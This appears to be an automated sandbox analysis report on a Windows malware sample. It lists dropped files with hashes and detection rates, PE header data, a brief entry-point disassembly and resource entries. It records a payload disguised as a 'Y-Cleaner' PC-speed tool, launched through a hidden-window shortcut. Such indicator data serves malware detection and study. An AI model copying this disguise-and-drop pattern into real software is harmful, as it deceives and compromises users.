                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="533847" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                Process:C:\Users\user\Desktop\nRGKqzVQRt.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):21
                                                Entropy (8bit):3.880179922675737
                                                Encrypted:false
                                                SSDEEP:3:gFsR0GOWW:gyRhI
                                                MD5:408E94319D97609B8E768415873D5A14
                                                SHA1:E1F56DE347505607893A0A1442B6F3659BEF79C4
                                                SHA-256:E29A4FD2CB1F367A743EA7CFD356DBD19AEB271523BBAE49D4F53257C3B0A78D
                                                SHA-512:994FA19673C6ADC2CC5EF31C6A5C323406BB351551219EE0EEDA4663EC32DAF2A1D14702472B5CF7B476809B088C85C5BE684916B73046DA0DF72236BC6F5608
                                                Malicious:false
                                                Preview:9tKiK3bsYm4fMuK47Pk3s
                                                Process:C:\Users\user\Desktop\nRGKqzVQRt.exe
                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):1502720
                                                Entropy (8bit):7.646111739368707
                                                Encrypted:false
                                                SSDEEP:24576:7i4dHPD/8u4dJG/8yndSzGmTG2/mR2SGeYdc0GmTG2/mR6Trr2h60qP:7rPD/8I/8ly+Zrr2h60qP
                                                MD5:A8CF5621811F7FAC55CFE8CB3FA6B9F6
                                                SHA1:121356839E8138A03141F5F5856936A85BD2A474
                                                SHA-256:614A0362AB87CEE48D0935B5BB957D539BE1D94C6FDEB3FE42FAC4FBE182C10C
                                                SHA-512:4479D951435F222CA7306774002F030972C9F1715D6AAF512FCA9420DD79CB6D08240F80129F213851773290254BE34F0FF63C7B1F4D554A7DB5F84B69E84BDD
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 75%
                                                • Antivirus: Virustotal, Detection: 60%, Browse
                                                Joe Sandbox View:
                                                • Filename: BDY5OFXpM9.exe, Detection: malicious, Browse
                                                • Filename: file.exe, Detection: malicious, Browse
                                                • Filename: univ.exe, Detection: malicious, Browse
                                                • Filename: univ.exe, Detection: malicious, Browse
                                                • Filename: file.exe, Detection: malicious, Browse
                                                • Filename: file.exe, Detection: malicious, Browse
                                                • Filename: CSBls4grBI.exe, Detection: malicious, Browse
                                                • Filename: SecuriteInfo.com.Win32.CrypterX-gen.27154.11356.exe, Detection: malicious, Browse
                                                • Filename: SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.589.31532.exe, Detection: malicious, Browse
                                                • Filename: file.exe, Detection: malicious, Browse
                                                Process:C:\Users\user\Desktop\nRGKqzVQRt.exe
                                                File Type:very short file (no magic)
                                                Category:dropped
                                                Size (bytes):1
                                                Entropy (8bit):0.0
                                                Encrypted:false
                                                SSDEEP:3:V:V
                                                MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                Malicious:false
                                                Preview:0
                                                Process:C:\Users\user\Desktop\nRGKqzVQRt.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):7
                                                Entropy (8bit):2.2359263506290326
                                                Encrypted:false
                                                SSDEEP:3:xIAn:z
                                                MD5:8FA007FA30513F97141DA3E39B658159
                                                SHA1:AA260A3AF3BB77E2A07056AFE79F3E2B88DB7257
                                                SHA-256:3279465B2D2603BE30735D69F5439CF95136E4725A85DC0B2EA09DB0E57B092F
                                                SHA-512:B2AF43AF1D4AC0DF6AE71895C9BFFC5E5FDC114F385C38F76CCF79EA8796A0CDFC6B5DAA92EE1CA347A7282A7B0FC6E89863E9CF30891FBF151B88FB1E668E1F
                                                Malicious:false
                                                Preview:mixnine
                                                Process:C:\Users\user\Desktop\nRGKqzVQRt.exe
                                                File Type:very short file (no magic)
                                                Category:dropped
                                                Size (bytes):1
                                                Entropy (8bit):0.0
                                                Encrypted:false
                                                SSDEEP:3:V:V
                                                MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                Malicious:false
                                                Preview:0
                                                Process:C:\Users\user\Desktop\nRGKqzVQRt.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):242176
                                                Entropy (8bit):6.47050397947197
                                                Encrypted:false
                                                SSDEEP:6144:SIQpxILDXGGMO7Ice9C5kQw2hWHcHTykhb:SIQpxILDXGGlET9n/cHG
                                                MD5:2ECB51AB00C5F340380ECF849291DBCF
                                                SHA1:1A4DFFBCE2A4CE65495ED79EAB42A4DA3B660931
                                                SHA-256:F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF
                                                SHA-512:E241A48EAFCAF99187035F0870D24D74AE97FE84AAADD2591CCEEA9F64B8223D77CFB17A038A58EADD3B822C5201A6F7494F26EEA6F77D95F77F6C668D088E6B
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                • Antivirus: Virustotal, Detection: 1%, Browse
                                                Joe Sandbox View:
                                                • Filename: BDY5OFXpM9.exe, Detection: malicious, Browse
                                                • Filename: file.exe, Detection: malicious, Browse
                                                • Filename: univ.exe, Detection: malicious, Browse
                                                • Filename: univ.exe, Detection: malicious, Browse
                                                • Filename: file.exe, Detection: malicious, Browse
                                                • Filename: file.exe, Detection: malicious, Browse
                                                • Filename: CSBls4grBI.exe, Detection: malicious, Browse
                                                • Filename: SecuriteInfo.com.Win32.CrypterX-gen.27154.11356.exe, Detection: malicious, Browse
                                                • Filename: SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.589.31532.exe, Detection: malicious, Browse
                                                • Filename: file.exe, Detection: malicious, Browse
                                                Process:C:\Users\user\Desktop\nRGKqzVQRt.exe
                                                File Type:very short file (no magic)
                                                Category:dropped
                                                Size (bytes):1
                                                Entropy (8bit):0.0
                                                Encrypted:false
                                                SSDEEP:3:V:V
                                                MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                Malicious:false
                                                Preview:0
                                                Process:C:\Users\user\Desktop\nRGKqzVQRt.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):97296
                                                Entropy (8bit):7.9982317718947025
                                                Encrypted:true
                                                SSDEEP:1536:A1FazaNKjs9ezO6kGnCRFVjltPjM9Ew1MhiIeJfZCQdOlnq32YTCUZiyAS3tUX9F:k4zaMjVUGCRzbgqw1MoIeJyQ4nyqX9F
                                                MD5:E6743949BBF24B39B25399CD7C5D3A2E
                                                SHA1:DBE84C91A9B0ACCD2C1C16D49B48FAEAEC830239
                                                SHA-256:A3B82FC46635A467CC8375D40DDBDDD71CAE3B7659D2BB5C3C4370930AE9468C
                                                SHA-512:3D50396CDF33F5C6522D4C485D96425C0DDB341DB9BD66C43EAE6D8617B26A4D9B4B9A5AEE0457A4F1EC6FAC3CB8208C562A479DCAE024A50143CBFA4E1F15F6
                                                Malicious:false
                                                Process:C:\Users\user\Desktop\nRGKqzVQRt.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):242176
                                                Entropy (8bit):6.47050397947197
                                                Encrypted:false
                                                SSDEEP:6144:SIQpxILDXGGMO7Ice9C5kQw2hWHcHTykhb:SIQpxILDXGGlET9n/cHG
                                                MD5:2ECB51AB00C5F340380ECF849291DBCF
                                                SHA1:1A4DFFBCE2A4CE65495ED79EAB42A4DA3B660931
                                                SHA-256:F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF
                                                SHA-512:E241A48EAFCAF99187035F0870D24D74AE97FE84AAADD2591CCEEA9F64B8223D77CFB17A038A58EADD3B822C5201A6F7494F26EEA6F77D95F77F6C668D088E6B
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                • Antivirus: Virustotal, Detection: 1%, Browse
                                                Process:C:\Users\user\Desktop\nRGKqzVQRt.exe
                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):1502720
                                                Entropy (8bit):7.646111739368707
                                                Encrypted:false
                                                SSDEEP:24576:7i4dHPD/8u4dJG/8yndSzGmTG2/mR2SGeYdc0GmTG2/mR6Trr2h60qP:7rPD/8I/8ly+Zrr2h60qP
                                                MD5:A8CF5621811F7FAC55CFE8CB3FA6B9F6
                                                SHA1:121356839E8138A03141F5F5856936A85BD2A474
                                                SHA-256:614A0362AB87CEE48D0935B5BB957D539BE1D94C6FDEB3FE42FAC4FBE182C10C
                                                SHA-512:4479D951435F222CA7306774002F030972C9F1715D6AAF512FCA9420DD79CB6D08240F80129F213851773290254BE34F0FF63C7B1F4D554A7DB5F84B69E84BDD
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 75%
                                                • Antivirus: Virustotal, Detection: 60%, Browse
                                                Process:C:\Users\user\Desktop\nRGKqzVQRt.exe
                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Icon number=0, Archive, ctime=Tue Oct 8 01:24:39 2024, mtime=Tue Oct 8 01:24:39 2024, atime=Tue Oct 8 01:24:39 2024, length=1502720, window=hide
                                                Category:dropped
                                                Size (bytes):2130
                                                Entropy (8bit):3.766579029471561
                                                Encrypted:false
                                                SSDEEP:24:8/SuZDwlXnoXb+R54gK1FDS6A5asvNKLALvO4ZaqLmczqygm:8/SuZDwlYCRgDQUsvNKLALvZaqLIyg
                                                MD5:F4C05B493146612E0EEFB3BB571617C7
                                                SHA1:03FD1BE52006CAA39ACE14BEE8B27808694B37EF
                                                SHA-256:81BB2249B78BC51DD125C1EFC506E9682D52618BA4D40098F1DB23F3317F3B66
                                                SHA-512:C715FDCD8349CD2EBCE0AC54BC78D5F23AB12E832032F224DC158DBA8CE7396CFF95CFC203BB68D7BF9D13582167E1FB197A7BF74FE1188E58C71FFBAD50FCE8
                                                Malicious:false
                                                Preview:L..................F.@.. ...[[):)....+:)....+:)...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S...k.+.).....2:).......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2HY.............................^.A.p.p.D.a.t.a...B.P.1.....HY....Local.<......EW<2HY......[.....................;'..L.o.c.a.l.....N.1.....HY....Temp..:......EW<2HY......^......................c..T.e.m.p.....b.1.....HY....DV9E5W~1..J......HY..HY............................Db..D.V.9.E.5.w.t.3.w.G.Z.3.....h.2.....HY.. .Y-CLEA~1.EXE..L......HY..HY............................'. .Y.-.C.l.e.a.n.e.r...e.x.e.......n...............-.......m...................C:\Users\user\AppData\Local\Temp\DV9E5wt3wGZ3\Y-Cleaner.exe....M.a.k.e. .y.o.u.r. .P.C. .f.a.s.t.e.r.0.....\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.D.V.9.E.5.w.t.3.w.G.Z.3.\.Y.-.C.l.e.a.n.e.r...e.x.e.?.C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.D.V.9.E.5.w.t.3.w.G.Z.3.\.Y.-.C.l.e.a.n.e.r...e.
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:MS Windows registry file, NT/2000 or above
                                                Category:dropped
                                                Size (bytes):1835008
                                                Entropy (8bit):4.468616537615864
                                                Encrypted:false
                                                SSDEEP:6144:FzZfpi6ceLPx9skLmb0f4ZWSP3aJG8nAgeiJRMMhA2zX4WABluuNajDH5S:9ZHt4ZWOKnMM6bFpMj4
                                                MD5:953AA484262C7942686C8FBABF395EE4
                                                SHA1:CE4969FCC0843909C6B3C017A93B6F934372B728
                                                SHA-256:4FCBC56817D2FA6A4C38842356DBAB787940BB659F61A5FBFA9FE075B34FAF41
                                                SHA-512:45FD4C2C23D8E818CC2208BE92FC9239D26CB128E41E14DAFA114249CBFCEFAEF3E7214664597612E6E83F9B0B1DD607A0FFA6C4F374C364E026993073CA404F
                                                Malicious:false
                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                Entropy (8bit):6.488874466807352
                                                TrID:
                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                • DOS Executable Generic (2002/1) 0.02%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name:nRGKqzVQRt.exe
                                                File size:465'920 bytes
                                                MD5:75c689774e5b58a3c4ced392928b6053
                                                SHA1:6df791246e3cf66eaca12d98c0d92a686423316f
                                                SHA256:6bfff4412fcb97df9d2a431f513eca541576330aed2859ecba479daa8831e47e
                                                SHA512:6d3bc7eb3822c2f722e5878e79b0484d2001dcaa2badd114143a5e13bb8017af2360e52c0e8accbc81bdf1d3d966434c46b832edce69de1d3bbc7c99fc1be9bd
                                                SSDEEP:6144:CD+iX4dXR1M2Wg6TiJrUU5HNJU1oP6lG8iOaT+y6BbOkT0:YF8W2uOUObylG8ouNOM
                                                TLSH:FFA4BF02A2DDEE71E6E246318D3DE7E4365DB8528F25279B339C6A2F1B702D1C272315
                                                Icon Hash:d7a99a8a8651790c
                                                Entrypoint:0x440f42
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                Time Stamp:0x65C7E543 [Sat Feb 10 21:06:11 2024 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:5
                                                OS Version Minor:1
                                                File Version Major:5
                                                File Version Minor:1
                                                Subsystem Version Major:5
                                                Subsystem Version Minor:1
                                                Import Hash:b9e90b72c18cbd740db39440a20246de
                                                Instruction
                                                call 00007F148084F4ACh
                                                jmp 00007F148084B12Eh
                                                push dword ptr [0045AD34h]
                                                call dword ptr [00401134h]
                                                test eax, eax
                                                je 00007F148084B2A4h
                                                call eax
                                                push 00000019h
                                                call 00007F148084E91Eh
                                                push 00000001h
                                                push 00000000h
                                                call 00007F148084CE60h
                                                add esp, 0Ch
                                                jmp 00007F148084CE25h
                                                mov edi, edi
                                                push ebp
                                                mov ebp, esp
                                                sub esp, 20h
                                                mov eax, dword ptr [ebp+08h]
                                                push esi
                                                push edi
                                                push 00000008h
                                                pop ecx
                                                mov esi, 004013F4h
                                                lea edi, dword ptr [ebp-20h]
                                                rep movsd
                                                mov dword ptr [ebp-08h], eax
                                                mov eax, dword ptr [ebp+0Ch]
                                                pop edi
                                                mov dword ptr [ebp-04h], eax
                                                pop esi
                                                test eax, eax
                                                je 00007F148084B2AEh
                                                test byte ptr [eax], 00000008h
                                                je 00007F148084B2A9h
                                                mov dword ptr [ebp-0Ch], 01994000h
                                                lea eax, dword ptr [ebp-0Ch]
                                                push eax
                                                push dword ptr [ebp-10h]
                                                push dword ptr [ebp-1Ch]
                                                push dword ptr [ebp-20h]
                                                call dword ptr [00401160h]
                                                leave
                                                retn 0008h
                                                mov edi, edi
                                                push ebp
                                                mov ebp, esp
                                                push ecx
                                                push ebx
                                                mov eax, dword ptr [ebp+0Ch]
                                                add eax, 0Ch
                                                mov dword ptr [ebp-04h], eax
                                                mov ebx, dword ptr fs:[00000000h]
                                                mov eax, dword ptr [ebx]
                                                mov dword ptr fs:[00000000h], eax
                                                mov eax, dword ptr [ebp+08h]
                                                mov ebx, dword ptr [ebp+0Ch]
                                                mov ebp, dword ptr [ebp-04h]
                                                mov esp, dword ptr [ebx-04h]
                                                jmp eax
                                                pop ebx
                                                leave
                                                retn 0008h
                                                pop eax
                                                pop ecx
                                                xchg dword ptr [esp], eax
                                                jmp eax
                                                pop eax
                                                pop ecx
                                                xchg dword ptr [esp], eax
                                                jmp eax
                                                pop eax
                                                pop ecx
                                                xchg dword ptr [esp], eax
                                                jmp eax
                                                Programming Language:
                                                • [ASM] VS2010 build 30319
                                                • [C++] VS2010 build 30319
                                                • [ C ] VS2010 build 30319
                                                • [IMP] VS2008 SP1 build 30729
                                                • [RES] VS2010 build 30319
                                                • [LNK] VS2010 build 30319
                                                Name | Virtual Address | Virtual Size | Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_IMPORT | 0x524ac | 0x78 | .text
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x6a000 | 0x18720 | .rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_DEBUG | 0x52524 | 0x1c | .text
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_TLS | 0x3bb80 | 0x18 | .text
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x3bb38 | 0x40 | .text
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_IAT | 0x1000 | 0x224 | .text
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                .text | 0x1000 | 0x52118 | 0x52200 | b13257a92856bae5eae8fcedaf5a7e78 | False | 0.7018050799086758 | data | 6.970623447290097 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                .data | 0x54000 | 0x120e4 | 0x6400 | 32df757b6cb131e0796eda9c7367ddd9 | False | 0.088046875 | data | 1.291504807816535 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .vuri | 0x67000 | 0x400 | 0x400 | 0f343b0931126a20f133d67c2b018a3b | False | 0.0166015625 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .gocezi | 0x68000 | 0xd6 | 0x200 | bf619eac0cdf3f68d496ea9344137e8b | False | 0.02734375 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .xolu | 0x69000 | 0x400 | 0x400 | 0f343b0931126a20f133d67c2b018a3b | False | 0.0166015625 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .rsrc | 0x6a000 | 0x18720 | 0x18800 | b88aed87326187b25c59a63350835409 | False | 0.4584861288265306 | data | 5.361393944268492 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_CURSOR | 0x7d190 | 0x330 | Device independent bitmap graphic, 48 x 96 x 1, image size 0 | | | 0.1948529411764706 |
| RT_CURSOR | 0x7d4c0 | 0x130 | Device independent bitmap graphic, 32 x 64 x 1, image size 0 | | | 0.33223684210526316 |
| RT_CURSOR | 0x7d618 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | | | 0.2953091684434968 |
| RT_CURSOR | 0x7e4c0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | | | 0.46705776173285196 |
| RT_CURSOR | 0x7ed68 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | | | 0.5361271676300579 |
| RT_CURSOR | 0x7f300 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | | | 0.30943496801705755 |
| RT_CURSOR | 0x801a8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | | | 0.427797833935018 |
| RT_CURSOR | 0x80a50 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | | | 0.5469653179190751 |
| RT_ICON | 0x6a910 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Tamil | India | 0.3694029850746269 |
| RT_ICON | 0x6a910 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Tamil | Sri Lanka | 0.3694029850746269 |
| RT_ICON | 0x6b7b8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Tamil | India | 0.4553249097472924 |
| RT_ICON | 0x6b7b8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Tamil | Sri Lanka | 0.4553249097472924 |
| RT_ICON | 0x6c060 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | Tamil | India | 0.4619815668202765 |
| RT_ICON | 0x6c060 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | Tamil | Sri Lanka | 0.4619815668202765 |
| RT_ICON | 0x6c728 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Tamil | India | 0.4552023121387283 |
| RT_ICON | 0x6c728 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Tamil | Sri Lanka | 0.4552023121387283 |
| RT_ICON | 0x6cc90 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Tamil | India | 0.2682572614107884 |
| RT_ICON | 0x6cc90 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Tamil | Sri Lanka | 0.2682572614107884 |
| RT_ICON | 0x6f238 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Tamil | India | 0.3074577861163227 |
| RT_ICON | 0x6f238 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Tamil | Sri Lanka | 0.3074577861163227 |
| RT_ICON | 0x702e0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Tamil | India | 0.3599290780141844 |
| RT_ICON | 0x702e0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Tamil | Sri Lanka | 0.3599290780141844 |
| RT_ICON | 0x707b0 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | Tamil | India | 0.7910447761194029 |
| RT_ICON | 0x707b0 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | Tamil | Sri Lanka | 0.7910447761194029 |
| RT_ICON | 0x71658 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | Tamil | India | 0.8086642599277978 |
| RT_ICON | 0x71658 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | Tamil | Sri Lanka | 0.8086642599277978 |
| RT_ICON | 0x71f00 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | Tamil | India | 0.8244219653179191 |
| RT_ICON | 0x71f00 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | Tamil | Sri Lanka | 0.8244219653179191 |
| RT_ICON | 0x72468 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | Tamil | India | 0.6826763485477179 |
| RT_ICON | 0x72468 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | Tamil | Sri Lanka | 0.6826763485477179 |
| RT_ICON | 0x74a10 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | Tamil | India | 0.7319418386491557 |
| RT_ICON | 0x74a10 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | Tamil | Sri Lanka | 0.7319418386491557 |
| RT_ICON | 0x75ab8 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2304 | Tamil | India | 0.7659836065573771 |
| RT_ICON | 0x75ab8 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2304 | Tamil | Sri Lanka | 0.7659836065573771 |
| RT_ICON | 0x76440 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | Tamil | India | 0.8093971631205674 |
| RT_ICON | 0x76440 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | Tamil | Sri Lanka | 0.8093971631205674 |
| RT_ICON | 0x76910 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Tamil | India | 0.3784648187633262 |
| RT_ICON | 0x76910 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Tamil | Sri Lanka | 0.3784648187633262 |
| RT_ICON | 0x777b8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Tamil | India | 0.5058664259927798 |
| RT_ICON | 0x777b8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Tamil | Sri Lanka | 0.5058664259927798 |
| RT_ICON | 0x78060 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | Tamil | India | 0.5599078341013825 |
| RT_ICON | 0x78060 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | Tamil | Sri Lanka | 0.5599078341013825 |
| RT_ICON | 0x78728 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Tamil | India | 0.583092485549133 |
| RT_ICON | 0x78728 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Tamil | Sri Lanka | 0.583092485549133 |
| RT_ICON | 0x78c90 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Tamil | India | 0.37053941908713695 |
| RT_ICON | 0x78c90 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Tamil | Sri Lanka | 0.37053941908713695 |
| RT_ICON | 0x7b238 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Tamil | India | 0.41228893058161353 |
| RT_ICON | 0x7b238 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Tamil | Sri Lanka | 0.41228893058161353 |
| RT_ICON | 0x7c2e0 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | Tamil | India | 0.40081967213114755 |
| RT_ICON | 0x7c2e0 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | Tamil | Sri Lanka | 0.40081967213114755 |
| RT_ICON | 0x7cc68 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Tamil | India | 0.46897163120567376 |
| RT_ICON | 0x7cc68 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Tamil | Sri Lanka | 0.46897163120567376 |
| RT_DIALOG | 0x81248 | 0x58 | data | | | 0.8977272727272727 |
| RT_STRING | 0x812a0 | 0x2c6 | data | Tamil | India | 0.4830985915492958 |
| RT_STRING | 0x812a0 | 0x2c6 | data | Tamil | Sri Lanka | 0.4830985915492958 |
| RT_STRING | 0x81568 | 0x6b4 | data | Tamil | India | 0.42657342657342656 |
| RT_STRING | 0x81568 | 0x6b4 | data | Tamil | Sri Lanka | 0.42657342657342656 |
| RT_STRING | 0x81c20 | 0x242 | data | Tamil | India | 0.4982698961937716 |
| RT_STRING | 0x81c20 | 0x242 | data | Tamil | Sri Lanka | 0.4982698961937716 |
| RT_STRING | 0x81e68 | 0x620 | data | Tamil | India | 0.4343112244897959 |
